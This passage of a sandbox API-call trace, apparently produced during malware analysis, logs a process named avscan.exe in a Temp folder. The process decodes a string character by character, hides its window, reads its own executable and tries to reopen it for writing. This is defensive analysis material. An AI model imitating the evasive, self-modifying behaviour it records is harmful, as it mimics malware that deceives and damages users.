lpWideCharStr="w") returned 1 [0136.752] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.752] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0136.753] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.753] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0136.753] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.754] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0136.754] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.755] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0136.755] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.755] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0136.756] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.756] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0136.756] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.757] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0136.757] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.758] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0136.758] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.758] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0136.759] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="e\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.759] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="X", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="X") returned 1 [0136.759] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.760] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="_", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr="_") returned 1 [0136.760] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.761] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0136.761] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.761] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0136.762] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.762] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="b", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="b") returned 1 [0136.762] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.763] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x114ee2c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0136.763] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f702, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01xú(", lpUsedDefaultChar=0x0) returned 1 [0136.764] VarSub (in: pvarLeft=0x28f954, pvarRight=0x28f890, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x114ee14, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0136.764] VarCat (in: pvarLeft=0x28f9d4, pvarRight=0x28f9a4, pvarResult=0x28f900 | out: pvarResult=0x28f900) returned 0x0 [0136.764] IsWindowVisible (hWnd=0x103b8) returned 0 [0136.765] ShowWindow (hWnd=0x103b8, nCmdShow=0) returned 0 [0136.765] GetWindowLongA (hWnd=0x103b8, nIndex=-20) returned 262400 [0136.765] SetWindowLongA (hWnd=0x103b8, nIndex=-20, dwNewLong=262400) returned 262400 [0136.765] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0x7c, wParam=0xffffffec, lParam=0x28f3e4) returned 0x0 [0136.765] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0x7d, wParam=0xffffffec, lParam=0x28f3e4) returned 0x0 [0136.766] NtdllDefWindowProc_A (hWnd=0x103b8, Msg=0xd, wParam=0x208, lParam=0x28dd08) returned 0x0 [0136.766] IsWindowVisible (hWnd=0x103b8) returned 0 [0136.766] ShowWindow (hWnd=0x103b8, nCmdShow=0) returned 0 [0136.766] ShowWindow (hWnd=0x60066, nCmdShow=0) returned 1 [0136.767] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0136.767] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x46, wParam=0x0, lParam=0x28f638) returned 0x0 [0136.769] NtdllDefWindowProc_A (hWnd=0x60066, Msg=0x47, wParam=0x0, lParam=0x28f638) returned 0x0 [0136.769] lstrcpynA (in: lpString1=0x28f44c, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0136.769] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0136.769] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0136.769] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0136.769] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0136.773] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x7) returned 0x10ebd40 [0136.773] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd08 | out: hHeap=0x10d0000) returned 1 [0136.773] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0136.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="avscan", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0136.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="avscan", cbMultiByte=-1, lpWideCharStr=0x115974c, cchWideChar=7 | out: lpWideCharStr="avscan") returned 7 [0136.774] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0136.774] CharUpperBuffW (in: lpsz="avscan", cchLength=0x7 | out: lpsz="AVSCAN") returned 0x7 [0136.774] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f560, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0136.774] lstrcpynA (in: lpString1=0x28f44c, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0136.774] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0136.774] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0136.774] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0136.774] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0136.778] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x7) returned 0x10ebd40 [0136.778] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd08 | out: hHeap=0x10d0000) returned 1 [0136.778] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0136.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="avscan", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0136.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="avscan", cbMultiByte=-1, lpWideCharStr=0x1159774, cchWideChar=7 | out: lpWideCharStr="avscan") returned 7 [0136.778] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0136.778] CharUpperBuffW (in: lpsz="avscan", cchLength=0x7 | out: lpsz="AVSCAN") returned 0x7 [0136.778] VarCmp (pvarLeft=0x28f8f0, pvarRight=0x28f974, lcid=0x0, dwFlags=0x30001) returned 0x1 [0136.778] VarCmp (pvarLeft=0x28f8c0, pvarRight=0x28f984, lcid=0x0, dwFlags=0x30001) returned 0x0 [0136.778] VarAnd (in: pvarLeft=0x28f8e0, pvarRight=0x28f8b0, pvarResult=0x28f8a0 | out: pvarResult=0x28f8a0) returned 0x0 [0136.937] FileSystemObject:IDispatch:Invoke (in: This=0xf22c3c, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f698, puArgErr=0x28f6c8 | out: pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f698*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6c8*=0x28f8c0) returned 0x0 [0136.940] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f9b4, pvarResult=0x28f8f0 | out: pvarResult=0x28f8f0) returned 0x0 [0137.047] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f484, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0137.047] lstrcpynA (in: lpString1=0x28f370, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0137.047] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0137.047] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0137.047] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0137.047] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0137.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=-1, lpWideCharStr=0x114fc44, cchWideChar=37 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37 [0137.048] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0137.156] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f484, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0137.156] lstrcpynA (in: lpString1=0x28f370, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0137.156] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0137.156] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0137.156] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0137.156] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0137.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="avscan", cbMultiByte=-1, lpWideCharStr=0x115974c, cchWideChar=7 | out: lpWideCharStr="avscan") returned 7 [0137.156] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0137.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f3c8, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0137.157] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f4f8, lpFilePart=0x28f3c0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f3c0*="avscan.exe") returned 0x2f [0137.157] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f4b8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0137.158] GetFileType (hFile=0x15c) returned 0x1 [0137.158] IMalloc:Alloc (This=0x76da66bc, cb=0x6c) returned 0x11514c8 [0137.158] IMalloc:Realloc (This=0x76da66bc, pv=0x0, cb=0x60) returned 0x114fca8 [0137.158] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.159] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1442557 [0137.159] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0139.274] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a9a) returned 0x63b0020 [0139.282] ReadFile (in: hFile=0x15c, lpBuffer=0x63b0020, nNumberOfBytesToRead=0x144254d, lpNumberOfBytesRead=0x28f558, lpOverlapped=0x0 | out: lpBuffer=0x63b0020*, lpNumberOfBytesRead=0x28f558*=0x144254d, lpOverlapped=0x0) returned 1 [0141.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MZ\x90", cbMultiByte=21243213, lpWideCharStr=0x3b20024, cchWideChar=21243213 | out: lpWideCharStr="MZ\x90") returned 21243213 [0141.988] IMalloc:Free (This=0x76da66bc, pv=0x63b0020) [0142.278] CloseHandle (hObject=0x15c) returned 1 [0142.278] IMalloc:Free (This=0x76da66bc, pv=0x11514c8) [0142.278] GetLocalTime (in: lpSystemTime=0x28f5d4 | out: lpSystemTime=0x28f5d4*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x2e, wMilliseconds=0xe7)) [0142.278] VarDateFromUdate (in: pudateIn=0x28f5f8, dwFlags=0x0, pdateOut=0x28f5d4 | out: pdateOut=0x28f5d4) returned 0x0 [0142.279] SysReAllocStringLen (in: pbstr=0x28f014*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x28f014*="kernel32.dll") returned 1 [0142.279] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0142.279] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x75a80000 [0142.287] GetLastError () returned 0x0 [0142.287] SetLastError (dwErrCode=0x0) [0142.292] GetProcAddress (hModule=0x75a80000, lpProcName="NlsGetCacheUpdateCount") returned 0x75aad34f [0142.293] SysReAllocStringLen (in: pbstr=0x28f1d8*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x28f1d8*="kernel32.dll") returned 1 [0142.293] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0142.294] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a80000 [0142.298] GetProcAddress (hModule=0x75a80000, lpProcName="GetCalendarInfoW") returned 0x75aad505 [0142.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f3c8, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0142.300] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f4f8, lpFilePart=0x28f3c0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f3c0*="avscan.exe") returned 0x2f [0142.300] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f4b8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.301] GetLastError () returned 0x20 [0142.301] GetLastError () returned 0x20 [0142.301] SetLastError (dwErrCode=0x20) [0142.301] GetLastError () returned 0x20 [0142.301] SetLastError (dwErrCode=0x20) [0142.301] GetLastError () returned 0x20 [0142.301] SetLastError 